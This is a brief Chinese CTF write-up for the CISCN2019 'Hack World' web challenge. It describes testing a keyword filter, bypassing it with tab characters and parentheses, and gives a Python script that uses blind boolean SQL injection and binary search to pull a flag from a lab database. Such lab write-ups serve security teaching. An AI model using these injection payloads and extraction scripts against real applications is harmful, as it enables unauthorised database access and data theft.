[CISCN2019 华北赛区 Day2 Web1]Hack World

• 测试过程
  猜测对字符过滤

继续测试发现 union # and or 空格 /**/ 均被过滤
1()有效，可利用函数
tab有效，尝试if(ascii(substr((select flag from flag),1,1))=ascii('f'),1,2)成功
因为函数有效，所以if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2)同理
且回显 Hello, glzjin wants a girlfriend.

• exp

#二分法

import requests
#import time
url = "http://986c9ab8-6a34-4259-a950-a4214f363284.node3.buuoj.cn/index.php"
key = {"id":""}
flag = ""
length = 0

for length in range(1,100):
    l = 33
    r = 126
    mid = (l+r) // 2
    while l < r:
        print(l,r,mid)
        # time.sleep(0.01)
        key["id"] = "if(ascii(substr((select	flag	from	flag),{},1))>{},1,2)".format(length,mid)
        re = requests.post(url,data=key)
        if 'Hello' in re.text:
            l = mid+1
            mid = (l+r) // 2
        else:
            r = mid
            mid = (l+r) // 2       
    flag += chr(mid)
    print flag
    if flag[-1] == '}':
        print flag
        break

请求过快导致断连，添加延时
v_v